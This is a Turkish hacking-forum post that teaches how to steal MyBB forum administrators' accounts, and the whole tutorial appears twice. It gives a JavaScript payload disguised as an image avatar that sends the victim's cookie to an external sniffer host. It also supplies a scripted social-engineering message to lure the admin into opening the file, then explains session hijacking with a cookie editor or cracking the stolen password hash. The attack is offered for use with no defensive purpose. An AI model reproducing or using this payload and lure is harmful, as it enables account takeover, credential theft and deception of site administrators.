Calvinator.KG
Spys-Z
- Katılım
- 22 Kas 2016
- Mesajlar
- 304
- Tepkime puanı
- 0
- Puanları
- 0
- Yaş
- 25
Evet Şimdi MyBB forumlardaki upload açığı sayesinde forumdaki yöneticilerin şifrelerini çalmayaı anlatacağım.
>İlk başta bir not defteri açıyoruz ve aşağıdaki verdiğim kodları için yazıyoruz farklı kaydet diyip ''.jpg veyada .gif'' şeklinde yani resim formatında kaydedeceğiz.
kod : **********img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;</script>
Daha sonra siteye üye olup avatar bölümünden göz at diyip resmimizi göz at diyip yüklüyoruz.
Resmimiz forumlarda gözükmeyecektir.Sağ Tıklayıp Özelliklerden Resmin URL sini yani adresini seçip kopyalıyoruz.
Sonra admine özel mesaj gönderiyoruz ve şu tarz bir bilgi yazıyoruz:
'' Ya kardeş benim Her Tarafta kullandığım çok sevdiğim bir avatarım var ama senin sitende görükmüyor sorun nedir acaba avatarın linkini verdim aşağıda diyoruz. ve avatarın linkini koyuyoruz.''
admin linke tıkladığı zaman admin cookie* hash* userid falan hepsi buraya geliyor
http://antichat.ru/sniff/log.php
Bilgiler geldikten sonra http://www.cookieeditor.com/ giderek cookie editörü indiriyoruz. ve kendi bilgilerimizi değiştirip adamın bilgilerini giriyoruz kaydediyoruz tekrar siteye giriyoruz ve admin girişi yapıyoruz. Yada admin hash'ı ile www.milw0rm.com 'dan kırdıktan sonra adamın nick'i ve şifresi ile online oluyoruz..
>İlk başta bir not defteri açıyoruz ve aşağıdaki verdiğim kodları için yazıyoruz farklı kaydet diyip ''.jpg veyada .gif'' şeklinde yani resim formatında kaydedeceğiz.
kod : **********img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;</script>
Daha sonra siteye üye olup avatar bölümünden göz at diyip resmimizi göz at diyip yüklüyoruz.
Resmimiz forumlarda gözükmeyecektir.Sağ Tıklayıp Özelliklerden Resmin URL sini yani adresini seçip kopyalıyoruz.
Sonra admine özel mesaj gönderiyoruz ve şu tarz bir bilgi yazıyoruz:
'' Ya kardeş benim Her Tarafta kullandığım çok sevdiğim bir avatarım var ama senin sitende görükmüyor sorun nedir acaba avatarın linkini verdim aşağıda diyoruz. ve avatarın linkini koyuyoruz.''
admin linke tıkladığı zaman admin cookie* hash* userid falan hepsi buraya geliyor
http://antichat.ru/sniff/log.php
Bilgiler geldikten sonra http://www.cookieeditor.com/ giderek cookie editörü indiriyoruz. ve kendi bilgilerimizi değiştirip adamın bilgilerini giriyoruz kaydediyoruz tekrar siteye giriyoruz ve admin girişi yapıyoruz. Yada admin hash'ı ile www.milw0rm.com 'dan kırdıktan sonra adamın nick'i ve şifresi ile online oluyoruz..